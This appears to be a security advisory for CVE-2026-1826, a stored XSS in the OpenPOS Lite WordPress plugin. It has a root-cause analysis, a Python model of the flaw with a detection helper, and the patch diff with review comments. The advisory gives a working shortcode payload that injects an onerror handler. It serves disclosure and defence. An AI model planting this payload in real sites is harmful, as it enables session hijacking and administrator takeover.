Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-1826: OpenPOS Lite <= 3.0 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes (wpos-lite-version)

CVE ID: CVE-2026-1826
Severity: Medium (CVSS 6.4)
CWE: CWE-79 (Improper Neutralization of Input During Web Page Generation, 'Cross-site Scripting')
Vulnerable Version: <= 3.0
Patched Version: 3.1
Disclosed: February 9, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1826:
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the OpenPOS Lite WordPress plugin (directory wpos-lite-version). It sits in the shortcode handlers that render QR code and barcode images, including the 'order_qrcode' shortcode, and lets an authenticated user with the Contributor role or higher store a payload that executes in the browser of anyone who views or previews a post containing the crafted shortcode. The CVSS score of 6.4 reflects a stored XSS that needs only low-privilege authenticated access.

The root cause is missing output escaping in the shortcode rendering functions in includes/admin/Admin.php. The return statements at line 3158 (the tail of _order_qrcode_func), line 3185 (_order_barcode_func), line 3244 (_barcode_img_func) and the QR code branch that follows it at line 3265 concatenate the user-controlled 'width' and 'height' shortcode attributes straight into the style attribute of an <img> tag. The values arrive through the $atts array that WordPress builds from the attributes written in the post content; nothing checks that they are numeric or free of quote characters before they reach the markup.

Exploitation requires an authenticated user with the Contributor role or higher, which is anyone who can create or edit a post. The attacker places the shortcode in a post with a 'width' or 'height' value that closes the style attribute and opens a new one. WordPress's shortcode parser accepts single-quoted attribute values, and a single-quoted value may contain double quotes, so a shortcode such as

[order_qrcode width='100" onerror="alert(1)//' height="100"]

is rendered by the vulnerable code (assuming the plugin's $unit is px) as

<img src="..." style="width: 100" onerror="alert(1)//px ;max-width:100" onerror="alert(1)//px;max-height:100px;height:100px">

The browser sees a new onerror attribute, and the trailing // comments out the unit and CSS the plugin appends after the value, so the handler stays valid JavaScript. The shortcode is plain text rather than HTML, so the wp_kses filtering WordPress applies to posts from users without the unfiltered_html capability leaves it untouched. Payloads that only place javascript: inside a CSS url() or add an unrelated shortcode attribute such as onload do not work here: current browsers do not run script from CSS URLs, and the handler echoes nothing but 'width' and 'height'. A Contributor cannot publish, so the payload first fires when an Editor or Administrator previews or reviews the pending post; after publication it fires for every visitor.

The patch wraps $atts['width'] and $atts['height'] in esc_attr() at each of the four return statements (lines 3158, 3185, 3244 and 3265). esc_attr() converts &, <, >, " and ' to HTML entities, so a quote in the value can no longer terminate the style attribute, which is enough to stop the attribute injection. It does not validate the value: a string such as 100;background:url(...) still lands inside the style attribute intact, which is not script execution in current browsers but is still attacker-controlled CSS on the page. A stricter fix would cast the values with absint() or reject anything that is not a plain length, and would use the cleaned value for the generateQRcode()/generateBarcode() calls as well, since those still receive the raw attributes. The same release also adds if ( ! defined( 'ABSPATH' ) ) exit; guards across the plugin's PHP files, renames the bundled CodeMirror assets to op_codemirror.js and op_codemirror.css, declares $_op_warehouse_id and $op_session_data as globals in the REST API classes, adds an is_numeric() check on the page parameter in Product.php, and removes several vendor files; none of these changes bears on the XSS.

Successful exploitation runs attacker-chosen JavaScript in the browser of any user who views the affected page, with that user's session and WordPress nonces available to it. Typical follow-ons are session hijacking, actions carried out with an administrator's privileges through the admin interface (up to administrative account takeover), content defacement, and redirection to attacker-controlled sites. Because the payload is stored in post content it persists across page loads and runs for every viewer, including the Editors and Administrators who review a Contributor's pending post.
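The attack, the fix and a detection check described above, modelled in Python as an added example (not code from the plugin or from Atomic Edge): a simplified re-implementation of WordPress's shortcode attribute grammar, the plugin's vulnerable and patched <img> construction copied from the Admin.php hunks, a stand-in esc_attr() built on html.escape, a stricter numeric validator (an assumed policy, not the vendor's fix), and a hunt helper that flags stored payloads in post content. The sample posts are constructed, UNIT = "px" is an assumption because the plugin's $unit is not in the diff, and the hunt only knows the order_qrcode tag because that is the only shortcode tag named on this page.

```python
import html
import re
from html.parser import HTMLParser

UNIT = "px"  # assumption: the plugin's $unit is not visible in the diff

# Simplified re-implementation of WordPress shortcode_parse_atts() quoting rules:
# name="value", name='value' or name=value. A single-quoted value may contain
# double quotes, which is what makes the attribute break-out possible.
_ATT_RE = re.compile(r"""(\w+)\s*=\s*"([^"]*)"|(\w+)\s*=\s*'([^']*)'|(\w+)\s*=\s*([^\s'"]+)""")
_SHORTCODE_RE = re.compile(r"\[order_qrcode(\s[^\]]*)?\]")  # only tag named on the page


def parse_shortcode_atts(text):
    """Return {name: value} for the attribute text inside one shortcode."""
    atts = {}
    for m in _ATT_RE.finditer(text):
        name, value = [g for g in m.groups() if g is not None][:2]
        atts[name.lower()] = value
    return atts


def esc_attr(value):
    """Stand-in for WordPress esc_attr(): entity-encode & < > " and '."""
    return html.escape(value, quote=True)


def _img_tag(w, h, img_src):
    """Same string the plugin returns in the Admin.php:3158 hunk."""
    return ('<img src="' + img_src + '" style="width: ' + w + UNIT + ' ;max-width:' + w + UNIT
            + ';max-height:' + h + UNIT + ';height:' + h + UNIT + '">')


def render_vulnerable(atts, img_src="data:image/png;base64,QUFBQQ=="):
    """Pre-patch behaviour: raw attribute values concatenated into the style attribute."""
    return _img_tag(atts.get("width", ""), atts.get("height", ""), img_src)


def render_patched(atts, img_src="data:image/png;base64,QUFBQQ=="):
    """Post-patch behaviour: esc_attr() on each value, nothing else changed."""
    return _img_tag(esc_attr(atts.get("width", "")), esc_attr(atts.get("height", "")), img_src)


class _AttrCollector(HTMLParser):
    """Collects every attribute a browser-side parser would see, duplicates included."""

    def __init__(self):
        super().__init__()
        self.attrs = []

    def handle_starttag(self, tag, attrs):
        self.attrs.extend(attrs)


def event_handler_attrs(rendered):
    """Names of on* attributes in the rendered tag; any hit means script can run."""
    p = _AttrCollector()
    p.feed(rendered)
    p.close()
    return [name for name, _ in p.attrs if name.startswith("on")]


def validate_length(value):
    """Stricter alternative to escaping alone: accept only a plain positive integer
    (assumed policy; the vendor's fix stops at esc_attr). Returns int or None."""
    return int(value) if re.fullmatch(r"[1-9]\d{0,3}", value or "") else None


def find_suspicious_shortcodes(post_content):
    """Hunt helper: report width/height values that are not plain numbers."""
    hits = []
    for m in _SHORTCODE_RE.finditer(post_content):
        atts = parse_shortcode_atts(m.group(1) or "")
        for name in ("width", "height"):
            if name in atts and validate_length(atts[name]) is None:
                hits.append((name, atts[name]))
    return hits


# Constructed sample posts. The payload closes the style attribute, adds onerror,
# and the trailing // comments out the "px ;max-width:..." tail the plugin
# appends, so the handler stays valid JavaScript.
PAYLOAD_POST = """Monthly report\n[order_qrcode width='100" onerror="alert(1)//' height="100"]"""
BENIGN_POST = '[order_qrcode width="150" height="150"]'


def demo():
    atts = parse_shortcode_atts(_SHORTCODE_RE.search(PAYLOAD_POST).group(1))
    return {
        "vulnerable_handlers": event_handler_attrs(render_vulnerable(atts)),
        "patched_handlers": event_handler_attrs(render_patched(atts)),
        "hunt_hits": find_suspicious_shortcodes(PAYLOAD_POST + BENIGN_POST),
    }


if __name__ == "__main__":
    print(demo())
```

Running the script shows two onerror attributes in the vulnerable render, none in the patched one, and one hunt hit for the stored payload. The hunt deliberately flags anything that is not a plain number, so 100;background:url(x) is reported even though esc_attr() keeps it from breaking out of the attribute; to cover the barcode shortcodes, add their tags to the regex after confirming the names in the plugin's add_shortcode() calls.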

Differential between vulnerable and patched code

Code Diff
--- a/wpos-lite-version/includes/Setting.php
+++ b/wpos-lite-version/includes/Setting.php
@@ -1,4 +1,7 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
+?>
+<?php
 if(!class_exists('Openpos_Setting'))
 {
     class Openpos_Setting
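Review bot: the close/reopen of the PHP block (`?>` immediately followed by `<?php`) around the new guard is unnecessary and the same pattern is repeated in several templates in this patch; the guard can sit in the existing `<?php` block directly above `if(!class_exists('Openpos_Setting'))`. A stray `?>` in a pure-PHP file is also how whitespace ends up in output before headers are sent.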
--- a/wpos-lite-version/includes/admin/Admin.php
+++ b/wpos-lite-version/includes/admin/Admin.php
@@ -2768,8 +2768,8 @@


     public function admin_receipt_enqueue(){
-        wp_enqueue_script('op.jquery.codemirror',WPOSL_URL.'/assets/js/codemirror.js',array('jquery'));
-        wp_enqueue_style( 'op.codemirror',WPOSL_URL.'/assets/css/codemirror.css' );
+        wp_enqueue_script('op.jquery.codemirror',WPOSL_URL.'/assets/js/op_codemirror.js',array('jquery'));
+        wp_enqueue_style( 'op.codemirror',WPOSL_URL.'/assets/css/op_codemirror.css' );
         $this->admin_style();


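Review bot: the renamed asset is enqueued with no version argument, so the next change to op_codemirror.js will again be served from browser caches until the file is renamed once more; pass the plugin version as the fourth argument of wp_enqueue_script() and the third of wp_enqueue_style(). The same two calls are duplicated in admin_enqueue_setting() below and should share one helper.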
@@ -2778,8 +2778,8 @@
     public function admin_enqueue_setting() {
         global $OPENPOS_SETTING;
         $OPENPOS_SETTING->admin_enqueue_scripts();
-        wp_enqueue_script('op.jquery.codemirror',WPOSL_URL.'/assets/js/codemirror.js',array('jquery'));
-        wp_enqueue_style( 'op.codemirror',WPOSL_URL.'/assets/css/codemirror.css' );
+        wp_enqueue_script('op.jquery.codemirror',WPOSL_URL.'/assets/js/op_codemirror.js',array('jquery'));
+        wp_enqueue_style( 'op.codemirror',WPOSL_URL.'/assets/css/op_codemirror.css' );
         $this->admin_style();

     }
@@ -3158,7 +3158,7 @@
         }
         //$img_src = esc_url('https://chart.googleapis.com/chart?chs=150x150&cht=qr&chl='.$barcode.'&choe=UTF-8');
         $img_src = $this->core->generateQRcode($barcode,$atts['width'],$atts['height']);
-        return '<img src="'.$img_src.'" style="width: '.$atts['width'].$unit.' ;max-width:'.$atts['width'].$unit.';max-height:'.$atts['height'].$unit.';height:'.$atts['height'].$unit.'">';
+        return '<img src="'.$img_src.'" style="width: '.esc_attr($atts['width']).$unit.' ;max-width:'.esc_attr($atts['width']).$unit.';max-height:'.esc_attr($atts['height']).$unit.';height:'.esc_attr($atts['height']).$unit.'">';

     }
     public function _order_barcode_func($atts)
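Review bot: esc_attr() stops a quote from closing the style attribute but does not validate the value, and the raw `$atts['width']`/`$atts['height']` are still passed to `generateQRcode()` on the line above. Normalise once, e.g. `$w = absint( $atts['width'] );`, and use that for both the generator call and the markup; `$img_src` is also emitted without esc_url()/esc_attr(), so its escaping depends entirely on what generateQRcode() returns.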
@@ -3185,7 +3185,7 @@
         $barcode_height = isset($atts['height']) ? $atts['height'] : null ;

         $img_data = $this->core->generateBarcode($barcode, $barcode_mode,$barcode_width,$barcode_height);
-        return '<img src="'.$img_data.'" style="width: '.$atts['width'].$unit.' ;max-width:'.$atts['width'].$unit.';max-height:'.$atts['height'].$unit.';height:'.$atts['height'].$unit.'">';
+        return '<img src="'.$img_data.'" style="width: '.esc_attr($atts['width']).$unit.' ;max-width:'.esc_attr($atts['width']).$unit.';max-height:'.esc_attr($atts['height']).$unit.';height:'.esc_attr($atts['height']).$unit.'">';
     }
     public function _barcode_img_func($atts)
     {
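Review bot: `$barcode_width` and `$barcode_height` are guarded with isset() but the return line still reads `$atts['width']` and `$atts['height']` directly, so a shortcode without those attributes raises an undefined-index notice and emits `width: px`. Use the guarded variables (or shortcode_atts() defaults) in the markup as well, and apply the same integer validation as for the QR code handler.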
@@ -3244,7 +3244,7 @@
                 }

                 $img_data = $this->core->generateBarcode($barcode, $barcode_mode,$barcode_w,$barcode_h);
-                return '<img src="'.$img_data.'" style="width: '.$atts['width'].$unit.' ;max-width:'.$atts['width'].$unit.';max-height:'.$atts['height'].$unit.';height:'.$atts['height'].$unit.'">';
+                return '<img src="'.$img_data.'" style="width: '.esc_attr($atts['width']).$unit.' ;max-width:'.esc_attr($atts['width']).$unit.';max-height:'.esc_attr($atts['height']).$unit.';height:'.esc_attr($atts['height']).$unit.'">';

             }else{
                 $chs = '100x100';
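Review bot: this is the third copy of the identical `<img ... style="width: ...">` string (3158, 3185, 3244, and 3265 below), each patched separately. Extract one helper that takes already-validated integer width/height and builds the tag, so escaping and the unit live in one place and the next shortcode cannot regress; here `$barcode_w`/`$barcode_h` are computed but the markup still reads `$atts` directly.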
@@ -3265,7 +3265,7 @@
                 $img_url = $this->core->generateQRcode($barcode,$barcode_w,$barcode_h);


-                return '<img src="'.$img_url.'" style="width: '.$atts['width'].$unit.' ;max-width:'.$atts['width'].$unit.';max-height:'.$atts['height'].$unit.';height:'.$atts['height'].$unit.'">';
+                return '<img src="'.$img_url.'" style="width: '.esc_attr($atts['width']).$unit.' ;max-width:'.esc_attr($atts['width']).$unit.';max-height:'.esc_attr($atts['height']).$unit.';height:'.esc_attr($atts['height']).$unit.'">';

             }
         }
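Review bot: `$img_url` is concatenated into `src` without esc_url(); the fix only covers the style attribute. Since `$barcode_w`/`$barcode_h` already exist on this path, use them (validated) in the markup instead of re-reading `$atts['width']`/`$atts['height']`.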
--- a/wpos-lite-version/includes/api/Api.php
+++ b/wpos-lite-version/includes/api/Api.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 if(!class_exists('OP_REST_API'))
 {
     class OP_REST_API extends WC_REST_CRUD_Controller{
@@ -95,6 +96,8 @@
                 }
                 if($session_data)
                 {
+                    global $op_session_data;
+                    $op_session_data = $session_data;
                     $this->session_data = $session_data;
                     return true;
                 }
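Review bot: the new `global $op_session_data` copies the authenticated session into a global with no comment on who reads it. State set during the authentication callback and read from a global is easy to overwrite from anything loaded later; prefer exposing `$this->session_data` through the controller, or at minimum document the consumer next to the declaration.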
--- a/wpos-lite-version/includes/api/Auth.php
+++ b/wpos-lite-version/includes/api/Auth.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 if(!class_exists('OP_REST_API_Auth'))
 {
     class OP_REST_API_Auth extends OP_REST_API{
--- a/wpos-lite-version/includes/api/Cart.php
+++ b/wpos-lite-version/includes/api/Cart.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 if(!class_exists('OP_REST_API_Cart'))
 {
     class OP_REST_API_Cart extends OP_REST_API{
--- a/wpos-lite-version/includes/api/Customer.php
+++ b/wpos-lite-version/includes/api/Customer.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 if(!class_exists('OP_REST_API_Customer'))
 {
     class OP_REST_API_Customer extends OP_REST_API{
--- a/wpos-lite-version/includes/api/Extension.php
+++ b/wpos-lite-version/includes/api/Extension.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 if(!class_exists('OP_REST_API_Extension'))
 {
     class OP_REST_API_Extension extends OP_REST_API{
--- a/wpos-lite-version/includes/api/Order.php
+++ b/wpos-lite-version/includes/api/Order.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 if(!class_exists('OP_REST_API_Order'))
 {
     class OP_REST_API_Order extends OP_REST_API{
@@ -487,6 +488,7 @@
         private function _add_order($order_data,$order_source,$is_clear = true){
             $result = array('status' => 0,'data' => array(),'message' => '');
             try{
+                global $_op_warehouse_id;
                 $use_hpos = $this->core_class->enable_hpos();
                 $session_data = $this->session_data;
                 $_op_warehouse_id = isset($session_data['login_warehouse_id']) ? $session_data['login_warehouse_id'] : 0;
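Review bot: adding `global $_op_warehouse_id;` ahead of the assignment turns what was a function-local variable into a write to a global, which is a behaviour change rather than hardening (any reader of the global previously saw nothing from this function). It is repeated in three more hunks below and is not mentioned in the changelog; document which code consumes the global and confirm the value is reset between the order paths within one request.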
@@ -665,6 +667,7 @@
             try{
                 $use_hpos = $this->core_class->enable_hpos();
                 $session_data = $this->session_data;
+                global $_op_warehouse_id;
                 $_op_warehouse_id = isset($session_data['login_warehouse_id']) ? $session_data['login_warehouse_id'] : 0;
                 $order_data_json = $request->get_param('order');//stripslashes($_REQUEST['order']);
                 $order_data = json_decode($order_data_json,true);
@@ -1544,6 +1547,7 @@
                 'api_message' => ''
             );
             try{
+                global $_op_warehouse_id;
                 $session_data = $this->session_data;
                 $use_hpos = $this->core_class->enable_hpos();
                 $login_warehouse_id = isset($session_data['login_warehouse_id']) ? $session_data['login_warehouse_id'] : 0;
@@ -1681,6 +1685,7 @@
                 'api_message' => ''
             );
             try{
+                global $_op_warehouse_id;
                 $session_data = $this->session_data;
                 $login_warehouse_id = isset($session_data['login_warehouse_id']) ? $session_data['login_warehouse_id'] : 0;
                 $_op_warehouse_id = $login_warehouse_id;
--- a/wpos-lite-version/includes/api/Product.php
+++ b/wpos-lite-version/includes/api/Product.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 if(!class_exists('OP_REST_API_Product'))
 {
     class OP_REST_API_Product extends OP_REST_API{
@@ -245,6 +246,10 @@
                 $local_db_version = $request->get_param( 'local_db_version' ) ? $request->get_param( 'local_db_version' ) : 0;
                 $online_db_version = $request->get_param( 'online_db_version' ) ? $request->get_param( 'online_db_version' ) : 0;
                 $page = $request->get_param( 'page' ) ? $request->get_param( 'page' ) : 1;
+                if(!$page || !is_numeric($page))
+                {
+                    $page = 1;
+                }
                 $database_version = get_option('_openpos_product_version_'.$login_warehouse_id,0);
                 if($local_db_version > 0)
                 {
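Review bot: is_numeric() accepts "1.5", "-2", "1e3" and values with leading whitespace, so `$page` can still reach the query as a non-integer; replace the new check and the earlier ternary with `$page = max( 1, absint( $request->get_param( 'page' ) ) );`. The `local_db_version` and `online_db_version` parameters read two lines above are compared numerically with no guard at all.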
--- a/wpos-lite-version/includes/api/Table.php
+++ b/wpos-lite-version/includes/api/Table.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 if(!class_exists('OP_REST_API_Table'))
 {
     class OP_REST_API_Table extends OP_REST_API{
--- a/wpos-lite-version/includes/api/Transaction.php
+++ b/wpos-lite-version/includes/api/Transaction.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 if(!class_exists('OP_REST_API_Transaction'))
 {
     class OP_REST_API_Transaction extends OP_REST_API{
--- a/wpos-lite-version/index.php
+++ b/wpos-lite-version/index.php
@@ -5,13 +5,13 @@
 Description: Quick POS system for woocommerce. This is Lite Version of OpenPOS
 Author: anhvnit@gmail.com
 Author URI: http://openswatch.com/
-Version: 3.0
+Version: 3.1
 WC requires at least: 2.6
-WC tested up to: 4.8.0
+WC tested up to: 10.5.0
 Text Domain: wpos-lite
 License: GPL version 2 or later - http://www.gnu.org/licenses/old-licenses/gpl-2.0.html
 */
-
+if ( ! defined( 'ABSPATH' ) ) exit;
 define('WPOSL_DIR',plugin_dir_path(__FILE__));
 define('WPOSL_URL',plugins_url('wpos-lite-version'));

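Review bot: "WC requires at least: 2.6" is left untouched while "tested up to" jumps to 10.5.0, yet the plugin calls `enable_hpos()` and imports the HPOS `OrdersTableDataStore` (class-op-woo-order.php below), neither of which exists in WooCommerce 2.6; raise the minimum to the version the plugin actually needs. Separately, `WPOSL_URL` hard-codes the directory name 'wpos-lite-version'; `plugins_url( '', __FILE__ )` survives a renamed plugin folder.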
--- a/wpos-lite-version/lib/abtract-op-app.php
+++ b/wpos-lite-version/lib/abtract-op-app.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 /**
  * Created by PhpStorm.
  * User: anhvnit
--- a/wpos-lite-version/lib/class-op-addon.php
+++ b/wpos-lite-version/lib/class-op-addon.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 //install_plugins_tabs
 if(!class_exists('OP_Addon'))
 {
--- a/wpos-lite-version/lib/class-op-exchange.php
+++ b/wpos-lite-version/lib/class-op-exchange.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 if(!class_exists('OP_Exchange'))
 {
     class OP_Exchange{
--- a/wpos-lite-version/lib/class-op-integration.php
+++ b/wpos-lite-version/lib/class-op-integration.php
@@ -5,6 +5,7 @@
  * Date: 9/18/18
  * Time: 17:17
  */
+if ( ! defined( 'ABSPATH' ) ) exit;
 if(!class_exists('OP_Integration'))
 {
     class OP_Integration{
--- a/wpos-lite-version/lib/class-op-receipt.php
+++ b/wpos-lite-version/lib/class-op-receipt.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 if(!class_exists('OP_Receipt'))
 {
     class OP_Receipt{
--- a/wpos-lite-version/lib/class-op-register.php
+++ b/wpos-lite-version/lib/class-op-register.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 if(!class_exists('OP_Register'))
 {
     class OP_Register{
--- a/wpos-lite-version/lib/class-op-report.php
+++ b/wpos-lite-version/lib/class-op-report.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 if(!class_exists('OP_Report'))
 {
     class OP_Report{
--- a/wpos-lite-version/lib/class-op-stock.php
+++ b/wpos-lite-version/lib/class-op-stock.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 if(!class_exists('OP_Stock'))
 {
     class OP_Stock{
--- a/wpos-lite-version/lib/class-op-supplier.php
+++ b/wpos-lite-version/lib/class-op-supplier.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 if(!class_exists('OP_Supplier'))
 {
     class OP_Supplier{
--- a/wpos-lite-version/lib/class-op-table.php
+++ b/wpos-lite-version/lib/class-op-table.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 if(!class_exists('OP_Table'))
 {
     class OP_Table{
--- a/wpos-lite-version/lib/class-op-transaction.php
+++ b/wpos-lite-version/lib/class-op-transaction.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 if(!class_exists('OP_Transaction'))
 {
     class OP_Transaction{
--- a/wpos-lite-version/lib/class-op-warehouse.php
+++ b/wpos-lite-version/lib/class-op-warehouse.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 if(!class_exists('OP_Warehouse'))
 {
     class OP_Warehouse{
--- a/wpos-lite-version/lib/class-op-woo-cart.php
+++ b/wpos-lite-version/lib/class-op-woo-cart.php
@@ -5,6 +5,7 @@
  * Date: 4/10/19
  * Time: 13:33
  */
+if ( ! defined( 'ABSPATH' ) ) exit;
 if(!class_exists('OP_Woo_Cart'))
 {
     class OP_Woo_Cart{
--- a/wpos-lite-version/lib/class-op-woo-order.php
+++ b/wpos-lite-version/lib/class-op-woo-order.php
@@ -6,6 +6,7 @@
  * Time: 13:33
  */
 use AutomatticWooCommerceInternalDataStoresOrdersOrdersTableDataStore;
+if ( ! defined( 'ABSPATH' ) ) exit;
 if(!class_exists('OP_Woo_Order'))
 {
     class OP_Woo_Order{
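Review bot: the `use AutomatticWooCommerceInternalDataStoresOrdersOrdersTableDataStore;` line as shown has no namespace separators. If the file really reads that way the import resolves nothing and any reference to OrdersTableDataStore is a fatal error; if this is a rendering artefact of the diff page, confirm the source has `Automattic\WooCommerce\Internal\DataStores\Orders\OrdersTableDataStore`. The same applies to `AutomatticWooCommerceUtilitiesOrderUtil` in the next hunk.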
--- a/wpos-lite-version/lib/class-op-woo.php
+++ b/wpos-lite-version/lib/class-op-woo.php
@@ -6,6 +6,7 @@
  * Time: 21:54
  */
 use AutomatticWooCommerceUtilitiesOrderUtil;
+if ( ! defined( 'ABSPATH' ) ) exit;
 class OP_Woo{
     private $settings_api;
     private $_core;
--- a/wpos-lite-version/lib/class-tgm-plugin-activation.php
+++ b/wpos-lite-version/lib/class-tgm-plugin-activation.php
@@ -31,7 +31,7 @@
 	along with this program; if not, write to the Free Software
 	Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 */
-
+if ( ! defined( 'ABSPATH' ) ) exit;
 if ( ! class_exists( 'TGMOP_Plugin_Activation' ) ) {

 	/**
--- a/wpos-lite-version/lib/integration/grconnect.php
+++ b/wpos-lite-version/lib/integration/grconnect.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 /**
  * Created by PhpStorm.
  * User: anhvnit
--- a/wpos-lite-version/lib/integration/woocommerce-product-addons.php
+++ b/wpos-lite-version/lib/integration/woocommerce-product-addons.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 /**
  * Created by PhpStorm.
  * User: anhvnit
--- a/wpos-lite-version/lib/integration/woocommerce-product-bundles.php
+++ b/wpos-lite-version/lib/integration/woocommerce-product-bundles.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 /**
  * Created by PhpStorm.
  * User: anhvnit
--- a/wpos-lite-version/lib/interface-op-app.php
+++ b/wpos-lite-version/lib/interface-op-app.php
@@ -5,6 +5,7 @@
  * Date: 3/19/19
  * Time: 23:36
  */
+if ( ! defined( 'ABSPATH' ) ) exit;
 Interface OP_App {

     public function get_key();
--- a/wpos-lite-version/lib/op-payment.php
+++ b/wpos-lite-version/lib/op-payment.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 function wc_openpos_offline_add_to_gateways( $gateways ) {
 	if(class_exists('WC_Payment_Gateway'))
 	{
--- a/wpos-lite-version/src/Models/Customer.php
+++ b/wpos-lite-version/src/Models/Customer.php
@@ -1,6 +1,6 @@
 <?php
 namespace OpModels;
-
+if ( ! defined( 'ABSPATH' ) ) exit;
 class Customer {
     public $id;
     public $avatar;
--- a/wpos-lite-version/src/Models/Order.php
+++ b/wpos-lite-version/src/Models/Order.php
@@ -1,6 +1,6 @@
 <?php
 namespace OpModels;
-
+if ( ! defined( 'ABSPATH' ) ) exit;
 class Order {
     public $id;
     public $session;
--- a/wpos-lite-version/src/Models/Outlet.php
+++ b/wpos-lite-version/src/Models/Outlet.php
@@ -1,5 +1,6 @@
 <?php
 namespace OpModels;
+if ( ! defined( 'ABSPATH' ) ) exit;
 class Outlet{
     public function __construct()
     {
--- a/wpos-lite-version/src/Models/Product.php
+++ b/wpos-lite-version/src/Models/Product.php
@@ -1,6 +1,6 @@
 <?php
 namespace OpModels;
-
+if ( ! defined( 'ABSPATH' ) ) exit;
 class Product {
     public $id;
     public $item_parent_id;
--- a/wpos-lite-version/src/Models/Register.php
+++ b/wpos-lite-version/src/Models/Register.php
@@ -1,5 +1,6 @@
 <?php
 namespace OpModels;
+if ( ! defined( 'ABSPATH' ) ) exit;
 class Register{
     public $_base_path;
     public $_post_type = '_op_register';
--- a/wpos-lite-version/src/Models/Session.php
+++ b/wpos-lite-version/src/Models/Session.php
@@ -2,7 +2,7 @@
 namespace OpModels;

 use WP_Filesystem_Direct;
-
+if ( ! defined( 'ABSPATH' ) ) exit;
 class Session{
     public $_base_path;
     public $_session_path;
--- a/wpos-lite-version/src/Models/Table.php
+++ b/wpos-lite-version/src/Models/Table.php
@@ -1,5 +1,6 @@
 <?php
 namespace OpModels;
+if ( ! defined( 'ABSPATH' ) ) exit;
 class Table{
     public function __construct()
     {
--- a/wpos-lite-version/src/Models/User.php
+++ b/wpos-lite-version/src/Models/User.php
@@ -2,7 +2,7 @@
 namespace OpModels;

 use WP_Error;
-
+if ( ! defined( 'ABSPATH' ) ) exit;
 class User{
     public function __construct()
     {
--- a/wpos-lite-version/templates/admin/receipt_template_composer.php
+++ b/wpos-lite-version/templates/admin/receipt_template_composer.php
@@ -1,4 +1,7 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
+?>
+<?php

 $op_nonce = wp_create_nonce( 'op_nonce' );
 ?>
--- a/wpos-lite-version/templates/admin/report/report_form.php
+++ b/wpos-lite-version/templates/admin/report/report_form.php
@@ -1,4 +1,7 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
+?>
+<?php
 $op_nonce = wp_create_nonce( 'op_nonce' );
 $payment_methods = array();
 $payment_methods[] = array(
--- a/wpos-lite-version/templates/admin/report/report_sales_chart.php
+++ b/wpos-lite-version/templates/admin/report/report_sales_chart.php
@@ -1,3 +1,6 @@
+<?php
+if ( ! defined( 'ABSPATH' ) ) exit;
+?>
 <div class="container-fluid op-main-content" style="margin-bottom: 5px;">
     <div class="row" id="summary-list">
         <div class="col-md-3 col-log-3 col-sm-3 col-xs-3">
--- a/wpos-lite-version/templates/admin/report/report_sales_table.php
+++ b/wpos-lite-version/templates/admin/report/report_sales_table.php
@@ -1,3 +1,6 @@
+<?php
+if ( ! defined( 'ABSPATH' ) ) exit;
+?>
 <div class="container-fluid op-main-content">
     <div class="row">
         <div class="col-md-12 col-log-12 col-sm-12 col-xs-12">
--- a/wpos-lite-version/templates/admin/report/report_transactions_chart.php
+++ b/wpos-lite-version/templates/admin/report/report_transactions_chart.php
@@ -1,3 +1,6 @@
+<?php
+if ( ! defined( 'ABSPATH' ) ) exit;
+?>
 <div class="container-fluid">
     <div class="row">
         <div class="col-md-12 col-log-12 col-sm-12 col-xs-12">
--- a/wpos-lite-version/templates/admin/report/report_transactions_table.php
+++ b/wpos-lite-version/templates/admin/report/report_transactions_table.php
@@ -1,3 +1,6 @@
+<?php
+if ( ! defined( 'ABSPATH' ) ) exit;
+?>
 <div class="container-fluid">
     <div class="row">
         <div class="col-md-12 col-log-12 col-sm-12 col-xs-12">
--- a/wpos-lite-version/templates/admin/woocommerce/order_exchanges.php
+++ b/wpos-lite-version/templates/admin/woocommerce/order_exchanges.php
@@ -1,3 +1,6 @@
+<?php
+if ( ! defined( 'ABSPATH' ) ) exit;
+?>
 <?php foreach($exchanges as $exchange):  ?>
 <tr>
     <td><img style="max-width: 19.5px;" src="data:image/png;base64,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" /></td>
